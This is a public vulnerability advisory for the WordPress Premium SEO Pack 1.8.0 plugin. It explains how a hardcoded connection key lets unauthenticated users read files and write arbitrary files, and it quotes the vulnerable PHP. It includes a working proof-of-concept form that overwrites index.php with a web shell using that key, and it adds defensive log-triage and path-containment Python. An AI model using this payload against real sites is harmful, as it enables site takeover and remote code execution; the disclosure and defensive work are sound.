WordPress Premium SEO Pack 1.8.0 Shell Upload / File Disclosure

WordPress Premium SEO Pack 1.8.0 Shell Upload / File Disclosure
Posted Apr 24, 2015
Authored by Evex

WordPress Premium SEO Pack plugin version 1.8.0 suffers from file disclosure and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability
SHA-256 | ac5f4c1d1a43f1db2b74fd991cc42657c14e00af6344504e6ebedd072e8cb46d

Premium SEO Pack WordPress Plugin Unauthenticated Arbitrary File Upload & LFD
Link: http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437

This plugin is vulnerable to Local File Disclosure and Remote Code Execution
via Arbitrary File Upload.

Vulnerable code (shortened):

class abmRemoteSupport{

    public function __construct(){
        $this->load_config();
        $this->validate_connection();
        $this->triggers();
    }

    private function load_config(){
        require_once( 'remote_init.php' );
        $this->config = $aa_tunnel_config;

        /* in remote_init.php
         * $aa_tunnel_config = array(
         *     "key" => "69efc4922575861f31125878597e97cf",
         * );
         */
    }

    private function validate_connection(){
        $coming_key = isset($_REQUEST['connection_key']) ? $_REQUEST['connection_key'] : '';
        if( trim($coming_key) == "" || $coming_key != $this->config['key'] ){
            $this->print_error( array('code' => 101, 'msg' => "Invalid key!"), 'fatal' );
        }
        return true;
    }

    private function triggers(){
        $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
        if( $action == 'browse_folder' )
            $this->browse_folder();
        if( $action == 'open_file' )
            $this->open_file();
        if( $action == 'save_file' )
            $this->save_file();
        $this->print_response();
    }

    private function save_file(){
        $file = isset($_REQUEST['file']) ? urldecode($_REQUEST['file']) : '';
        $file_content = isset($_REQUEST['file_content']) ? @base64_decode($_REQUEST['file_content']) : '';
        if( file_exists( $file )) {
            $write_file = @file_put_contents( $file, $file_content );
            if( $write_file ){
                $this->response = array('status' => 'valid', 'file_path' => $file,
                    'file_type' => end( explode(".", $file ) ));
            }else{
                $this->response = array('status' => 'invalid', 'msg' => 'Unable to write on file',
                    'file_type' => end( explode(".", $file ) ), 'file_path' => $file);
            }
        }
    }

    private function open_file()
    {
        $file = isset($_REQUEST['file']) ? $this->config['path'] . $_REQUEST['file'] : '';
        if( file_exists( $file ) ) {
            $file_content = file_get_contents( $file );
            $this->response = array(
                'status' => 'valid',
                'file_path' => $file,
                'file_type' => end( explode(".", $file ) ),
                'file_name' => end( explode("/", $file ) ),
                'file_alias' => md5( $file ),
                'content' => $file_content
            );
        }
    }

    // browse_folder(), print_error() and print_response() are omitted in this excerpt
}

new abmRemoteSupport();

Vulnerable code end.

As you can see, it does use authentication: the validate_connection() function
checks the key supplied in the request against the one defined in remote_init.php
($this->config['key']). That key is the MD5 value
'69efc4922575861f31125878597e97cf', but when authenticating it compares
$_REQUEST['connection_key'] with '69efc4922575861f31125878597e97cf' directly,
without MD5-hashing the requested key. The check can therefore be passed by
simply supplying the original value '69efc4922575861f31125878597e97cf'.

Conclusion: 'remote_tunnel.php'?!! This looks like a suspicious name. It is
unclear whether the vendor did this on purpose or not, because there are
protections in other methods.

Proof of Concept:

<form action="http://wordpress/wp-content/plugins/premium-seo-pack/modules/remote_support/remote_tunnel.php" method="post" >
    <input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" >
    <input name="action" value="save_file" ><br>
    <input name="file" value="../../../index.php"><br>
    <textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
    <input type="submit" ><br>
</form>
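As an added defender-side example, not part of Evex's advisory or of the plugin's code: a small Python script that triages web-server access-log lines for hits on the remote_tunnel.php endpoint named above, plus an is_contained() check showing the path restriction that save_file() and open_file() are missing. The log lines, client addresses and combined log format are constructed assumptions.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint path from the advisory; request targets are matched against it exactly.
TUNNEL_PATH = ("/wp-content/plugins/premium-seo-pack/modules/remote_support/"
               "remote_tunnel.php")
# Combined log format: client, method, request target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample lines (not real traffic): a POST like the advisory's form,
# a GET carrying the same parameters in the query string, and an unrelated hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Apr/2015:10:00:01 +0000] "POST ' + TUNNEL_PATH + ' HTTP/1.1" 200 512',
    '203.0.113.5 - - [24/Apr/2015:10:00:02 +0000] "GET ' + TUNNEL_PATH
    + '?connection_key=x&action=open_file&file=../../../index.php HTTP/1.1" 200 2048',
    '198.51.100.9 - - [24/Apr/2015:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 9000',
]


def triage_log_line(line):
    """Return a finding for a request to the tunnel endpoint, else None.
    POST bodies are not in an access log, so a POST only tells us the endpoint
    was reached; $_REQUEST also accepts GET, where action/file are visible."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != TUNNEL_PATH:
        return None
    params = parse_qs(url.query)
    file_arg = params.get("file", [""])[0]
    return {"ip": m.group("ip"), "method": m.group("method"),
            "status": m.group("status"), "action": params.get("action", [""])[0],
            "file": file_arg,
            # a ".." path component is the traversal the PoC relies on
            "traversal": ".." in file_arg.replace("\\", "/").split("/")}

def scan_log(lines):
    """Every hit on the tunnel endpoint is worth review; return them all."""
    return [f for f in map(triage_log_line, lines) if f]

def is_contained(base_dir, requested):
    """The check open_file()/save_file() lack: resolve the requested path and
    require it to stay under base_dir (absolute paths are rejected too)."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    return os.path.commonpath([base, target]) == base
```

Because the PoC form posts its parameters, an access log alone shows only that the endpoint was reached; any such request is worth pulling the POST body for from a WAF or full-packet capture if one exists.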

Timeline:
Discovered - March 2015
Vendor Contact - March 2015
No Reply - April 2015
Public Disclosure - April 2015

@Evex_1337
http://research.evex.pw/?vuln=12